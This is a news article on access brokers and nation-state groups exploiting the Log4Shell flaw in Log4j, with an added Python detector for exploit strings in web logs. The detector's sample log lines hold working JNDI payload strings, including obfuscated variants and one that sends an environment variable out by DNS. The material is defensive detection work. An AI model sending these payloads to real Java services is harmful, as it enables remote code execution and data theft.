Microsoft said it has observed multiple cybercriminal groups seeking to establish network access by exploiting the vulnerability in Apache Log4j, with the apparent goal of later selling that access to ransomware operators.

The arrival of these “access brokers,” who’ve been linked to ransomware affiliates, suggests that an “increase in human-operated ransomware” may follow against both Windows and Linux systems, the company said in an update to a blog post on the critical Log4j vulnerability, known as Log4Shell.

Nation-state activity

In the same post, Microsoft also said it has observed activity from nation-state groups—tied to countries including China, Iran, North Korea, and Turkey—seeking to exploit the Log4j vulnerability. In one instance, an Iranian group known as Phosphorus, which has previously deployed ransomware, has been seen “acquiring and making modifications of the Log4j exploit,” Microsoft said. “We assess that PHOSPHORUS has operationalized these modifications.”

The development follows shortly after the first ransomware payloads exploiting Log4Shell were disclosed. Security researchers at Bitdefender observed an attempt to deploy a new ransomware strain, Khonsari, using the Log4Shell vulnerability, which was revealed publicly last Thursday.

Researchers have also told VentureBeat that in recent days they've observed attackers potentially laying the groundwork for ransomware in a range of ways, such as deploying privilege escalation tools and bringing malicious Cobalt Strike servers online. Cobalt Strike is a commercial red-team tool that attackers commonly abuse for remote reconnaissance and lateral movement in ransomware attacks.

Microsoft itself, on Saturday, had reported seeing Cobalt Strike installed through exploitation of the Log4j vulnerability.

Now, Microsoft said it has observed activities by cybercriminals aimed at establishing a foothold inside a network using Log4Shell, with the expectation of selling that access to a “ransomware-as-a-service” operator.

In the blog post update, Microsoft’s threat research teams said that they “have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks.”

“These access brokers then sell access to these networks to ransomware-as-a-service affiliates,” the Microsoft researchers said in the post.

The researchers noted that they have “observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.”

Ransomware-as-a-service operators lease out ransomware variants to other attackers, saving them the effort of creating their own variants.

A growing threat

According to a previous report from Digital Shadows, “initial access brokers” have had a “growing role” in the cybercriminal space.

“Rather than infiltrating an organization deeply, this type of threat actor operates as a ‘middleman’ by breaching as many companies as possible and goes on to sell access to the highest bidder – often to ransomware groups,” Digital Shadows said.

Sean Gallagher, a senior threat researcher at Sophos, told VentureBeat on Tuesday that he has been expecting to see targeted efforts to plant backdoors in networks, including by access brokers who would then sell the backdoor to other criminals. “And those other criminals will inevitably include ransomware gangs,” Gallagher said.

At the time of this writing, there has been no public disclosure of a successful ransomware breach that exploited the vulnerability in Log4j.

Widespread vulnerability

Researchers said they do expect ransomware attacks to result from the vulnerability in Log4j, as the flaw is both widespread and considered trivial to exploit. Many applications and services written in Java are potentially vulnerable to Log4Shell, which can enable unauthenticated remote code execution. Researchers at cybersecurity giant Check Point said they've observed attempted exploits of the Log4j vulnerability on more than 44% of corporate networks worldwide.
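The exploitation attempts that Check Point and Microsoft describe leave a recognisable trace: a Log4j lookup string such as `${jndi:ldap://host/x}` planted in a field the server logs, most often the User-Agent or the request path. The following scanner is an added example for this article, not code from Microsoft, Check Point or any vendor quoted here. It assumes Combined Log Format access logs and the publicly documented obfuscation tricks (`${lower:j}`, `${::-j}`, URL-encoding), and runs over constructed sample lines embedded in the block; the IPs are documentation ranges and no line comes from a real incident.

```python
"""Detect Log4Shell (CVE-2021-44228) exploit attempts in web access logs.

Added example; not vendor code. Attackers rarely send a plain ${jndi:...}
string, so the scanner first collapses the nested-lookup obfuscation that
Log4j itself would resolve, then URL-decodes, then matches the JNDI URI.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format), made up for this
# example. Lines 1-4 carry exploit attempts in various disguises; 0 and 5
# are benign (5 contains an unrelated ${currency} placeholder).
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://198.51.100.7/x}"',
    '10.0.0.12 - - [13/Dec/2021:10:01:11 +0000] "GET /x HTTP/1.1" 200 10 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.8:1099/y}"',
    '10.0.0.13 - - [13/Dec/2021:10:01:15 +0000] '
    '"GET /?q=${jndi:dns://198.51.100.9/${env:USER}} HTTP/1.1" 200 10 "-" "curl/7.68.0"',
    '10.0.0.14 - - [13/Dec/2021:10:01:20 +0000] '
    '"GET /search?q=price%20in%20$%7Bcurrency%7D HTTP/1.1" 200 10 "-" "Mozilla"',
]

# An innermost lookup: ${...} whose body contains no further '${' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(m) -> str:
    """Evaluate one innermost lookup the way Log4j would, or leave it alone."""
    body = m.group(1)
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:NOPE:-j} or ${::-j}: text after ':-' is the default value,
        # which Log4j substitutes when the lookup itself is undefined.
        return body.split(":-", 1)[1]
    return m.group(0)  # e.g. ${jndi:...} or ${currency}: keep as written


def normalize_lookups(text: str) -> str:
    """URL-decode, then collapse obfuscating lookups until nothing changes."""
    text = unquote(text)
    while True:
        new = _INNER.sub(_resolve, text)
        if new == text:
            return new
        text = new


# JNDI URI with the protocols Log4j can reach; target stops at '/', '}' or space.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|http)"
    r"\s*:\s*//\s*(?P<target>[^/\s}\"]+)",
    re.IGNORECASE,
)


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """Return (scheme, target) for the first JNDI lookup in a log line, else None."""
    m = _JNDI.search(normalize_lookups(line))
    if not m:
        return None
    return m.group("scheme").lower(), m.group("target")


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_index, scheme, target) for every line carrying a JNDI lookup."""
    hits = []
    for idx, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((idx, *found))
    return hits


if __name__ == "__main__":
    for idx, scheme, target in scan(SAMPLE_LOGS):
        print(f"line {idx}: JNDI lookup via {scheme} -> {target}")
```

The target host and scheme are worth extracting rather than just flagging the line: the callback host is the indicator to block at egress and to pivot on across other logs, and a `dns://` target usually means the attacker is only probing for vulnerable hosts before a real `ldap://` or `rmi://` payload arrives. Matching on a fixed `${jndi:ldap` string would have missed three of the four constructed attempts above.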

“We haven’t necessarily seen direct ransomware deployment, but it’s just a matter of time,” said Nick Biasini, head of outreach at Cisco Talos, in an email Tuesday. “This is a high-severity vulnerability that can be found in countless products. The time required for everything to be patched alone will allow various threat groups to leverage this in a variety of attacks, including ransomware.”

The vulnerability arrives as the majority of businesses already report first-hand experience with ransomware over the past year. A recent survey from CrowdStrike found that 66% of organizations had experienced a ransomware attack in the previous 12 months, up from 56% in 2020. The average ransomware payment surged by about 63% in 2021, reaching $1.79 million, the report said.
